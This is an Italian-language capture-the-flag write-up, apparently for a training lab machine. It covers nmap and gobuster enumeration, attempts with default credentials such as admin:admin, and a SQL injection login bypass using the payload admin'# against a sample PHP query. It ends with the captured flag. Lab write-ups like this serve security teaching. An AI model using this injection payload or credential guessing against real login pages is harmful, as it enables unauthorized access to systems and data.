IP: 10.129.40.34
-----------------
scansiono con nmap specificando di scansionare gli scirpt e le versioni

sudo nmap 10.129.40.34 -sC -sV     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-03 04:55 EDT
Nmap scan report for 10.129.40.34
Host is up (0.043s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Login
|_http-server-header: Apache/2.4.38 (Debian)

vedo una sola porta aperta la 80 con un servizio http
volendo posso connetermi al server web http://10.129.40.34:80/
--------
installo go e installo gobuster
scarico la wordlist SecLists da github
cerco nel sito altre pagini presenti e vedo che non ce ne sono con gobuster
---------
gobuster dir --url http://10.129.40.34/ --wordlist /home/kali/Desktop/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.40.34/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/Desktop/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/07/03 05:29:05 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 313] [--> http://10.129.40.34/images/]
/css                  (Status: 301) [Size: 310] [--> http://10.129.40.34/css/]   
/js                   (Status: 301) [Size: 309] [--> http://10.129.40.34/js/]    
/vendor               (Status: 301) [Size: 313] [--> http://10.129.40.34/vendor/]
/fonts                (Status: 301) [Size: 312] [--> http://10.129.40.34/fonts/] 

una volta ricevuti i risultati non noto nulla di particolare in quanto i risultati sono standard di ogni website, non contengono file interessanti
------------
provo a loggarmi nella pagina con le credeziali "stupide"
admin:admin
guest:guest
user:user
root:root
administrator:password

ma nessun risultato
---------------
potrei continuare con un attacco bruteforce alle credenziali ma richiederebbe molto tempo e potrebbe venire scoperto, perciò passo ad una sql injection
---------
nel campo username scrivo "admin'#" in moda da chiudedre la queri con ' e commentare la parte dopo
per esempio se considere la query sotto che richiede username e password
$sql="SELECT * FROM users WHERE username='$username' AND password='$password'";
la trasformo in una richiesta di tutti gli username admin
$sql="SELECT * FROM users WHERE username='admin';
nel campo password posso mettere quello che volgio tanto è commentato
------------------
Your flag is: e3d0796d002a446c0e622226f42e9672
